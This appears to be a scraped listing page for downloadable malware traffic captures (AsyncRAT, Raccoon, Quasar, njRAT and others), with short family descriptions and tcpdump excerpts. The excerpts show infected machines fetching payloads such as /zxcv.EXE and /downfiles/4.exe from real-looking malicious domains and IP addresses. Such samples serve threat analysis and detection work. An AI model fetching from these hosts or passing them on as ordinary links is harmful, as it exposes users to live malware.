AsyncRAT RaccoonStealer tunnabelly.ug jamshed.pk vbchjfssdfcxbcver.ru thompson.ug PCAP Traffic Sample File Download

2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1
E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=90210-
Unless-Modified-Since: Sat, 20 Jun 2020 15:23:12 GMT
If-Range: "177000-5a8859680d070"
Host: jamshed.pk
Connection: Keep-Alive

2020-06-23 15:26:21.594726 IP 10.1.10.15.49724 > 64.31.23.18.80: Flags [.], ack 50, win 16363, length 0
E..(.>@...pQ . .@....<.P..fx..c.P.?...........

2020-06-23 15:26:21.673543 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], ack 502, win […]

AZORult RaccoonStealer Banking Malware Crypto Miner PCAP File Download Traffic Sample

AZORult/RaccoonStealer can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer should not be taken lightly, as it remains an active threat. Raccoon is an info-stealer available as Malware-as-a-Service: it can be obtained on a subscription costing $200 per month. Raccoon has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019.

Type: Stealer
Origin: ex-USSR

Raccoon malware comes with fairly basic info-stealer functions and by itself lacks any kind of […]

Quasar RAT ClipBanker Banking Trojan Malware PCAP File Download Traffic Sample

Quasar is a very popular RAT thanks to its source code being openly available. This malware can be used to remotely control the victim's computer. In this capture, 4.exe is the dropper for the banking trojan, and the GET /line requests to ip-api.com are Quasar's traffic.

Detection names: TrojanBanker:Win32/ClipBanker.777af9cd, Trojan[Banker]/Win32.ClipBanker

. .T&.h.c.P.J.\V.4.P.@)N.........
2020-06-23 14:29:07.371643 IP 10.1.10.15.49763 > 84.38.180.104.80: Flags [P.], seq 1:513, ack 1, win 16425, length 512: HTTP: GET /downfiles/4.exe HTTP/1.1
E..(..@....R . .T&.h.c.P.J.\V.4.P.@)....GET /downfiles/4.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET […]

APT 5 Syrian Iranian Malware RAT njRAT, NetWire, NanoCore, DarkComet, Babylon Traffic Sample PCAP File Download 141.255.152.104

2020-06-03 06:14:07.168233 IP 10.1.10.15.49510 > 191.234.186.189.80: Flags [P.], seq 1:432, ack 1, win 16560, length 431: HTTP: GET /kkkkkkk/ HTTP/1.1
E.....@...P. . ......f.P\.m...a.P.@.f}..GET /kkkkkkk/ HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://191.234.186.189/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 191.234.186.189
Connection: Keep-Alive

2020-06-03 06:14:07.315098 IP 191.234.186.189.80 > 10.1.10.15.49510: Flags [P.], seq 1:1222, ack 432, win 513, length 1221: HTTP: HTTP/1.1 200 OK
E...Y6@.m.!..... . ..P.f..a.\.o.P.......HTTP/1.1 200 OK
Date: Wed, 03 Jun 2020 10:16:23 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.29 […]